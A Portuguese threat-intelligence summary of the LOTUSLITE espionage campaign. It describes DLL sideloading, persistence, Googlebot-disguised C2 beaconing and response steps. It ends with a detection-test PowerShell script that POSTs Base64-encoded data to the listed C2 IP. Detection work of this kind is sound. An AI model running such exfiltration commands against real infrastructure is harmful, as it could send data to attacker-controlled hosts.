Campanha LOTUSLITE: Espionagem Direcionada Motivada por Narrativas Geopolíticas

Resumo

Acronis TRU observou uma operação de espionagem direcionada a organizações do governo dos EUA que entregou uma backdoor de DLL maliciosa, LOTUSLITE, dentro de um arquivo ZIP com tema político. Um executável carregador complementar carrega a DLL, após o qual a backdoor envia beacons para um endpoint C2 codificado em HTTPS enquanto imita um agente de usuário do Googlebot. Os operadores estabelecem persistência criando um diretório dedicado em ProgramData e adicionando uma entrada de registro de execução. Com base em padrões de operações sobrepostos, a atividade foi vinculada ao Mustang Panda.

Investigação

Os analistas desempacotaram o ZIP e identificaram o binário do loader (Maduro to be taken to New York.exe) juntamente com a DLL armada (kugou.dll). A análise documentou o fluxo de sideloading da DLL, comportamento de beaconing, uso de mutex e os artefatos exatos de persistência criados no host. A revisão da infraestrutura atribuiu comunicações a um único IP (172.81.60.97) e a um domínio hospedado na spryt.net, alegadamente hospedado em Phoenix, Arizona. Atribuição ao Mustang Panda foi avaliada com confiança moderada devido às táticas e padrões de infraestrutura compartilhados.

Mitigação

As detecções da Acronis basearam-se em hashes SHA-256 para os binários maliciosos e destacaram a pasta de persistência específica em ProgramData e a localização da chave de execução. Os controles de rede devem sinalizar conexões HTTPS de saída para o IP/dominio identificado quando emparelhado com uma string de agente de usuário do Googlebot. Reduza a persistência prevenindo a execução de binários desconhecidos de ProgramData e removendo a entrada do registro Run associada quando descoberta.

Resposta

Isole imediatamente os endpoints afetados, capture dados voláteis e preserve os binários maliciosos para análise. Remova a pasta ProgramData criada e exclua o valor correspondente do registro Run para quebrar a persistência. Bloqueie a conectividade com o IP e domínio C2, e atualize as detecções de endpoint com os hashes de arquivo e o indicador de mutex fornecidos. Finalmente, conduza uma caça em todo o ambiente para hosts adicionais exibindo as mesmas assinaturas de loader e DLL.

Execução da Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

• Narrativa de Ataque & Comandos:
  O atacante comprometeu uma estação de trabalho e instalou o backdoor LOTUSLITE. Para exfiltrar dados enquanto se mistura com o tráfego legítimo de web-crawlers, o backdoor emite um HTTP POST para o servidor C2 codificado 172.81.60.97. Ele define explicitamente o cabeçalho User-Agent como “Googlebot” para se mascarar como um rastreador de mecanismos de pesquisa, na esperança de passar despercebido por defesas de perímetro que permitem listas brancas para tais agentes. O payload contém dados exfiltrados codificados em Base64.

• Regressão do Script de Teste:

  # Simulação C2 do LOTUSLITE – powershell
  $c2 = "http://172.81.60.97/receive"
  $ua = "Googlebot"
  $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
  $body = @{ "data" = $data }
  
  try {
      Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
      Write-Host "C2 request sent successfully."
  } catch {
      Write-Error "C2 request failed: $_"
  }

• Comandos de Limpeza:

  # Remova quaisquer arquivos temporários ou conexões de rede remanescentes
  Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
  # (Nenhum serviço persistente foi criado nesta simulação)
  Write-Host "Limpeza completa."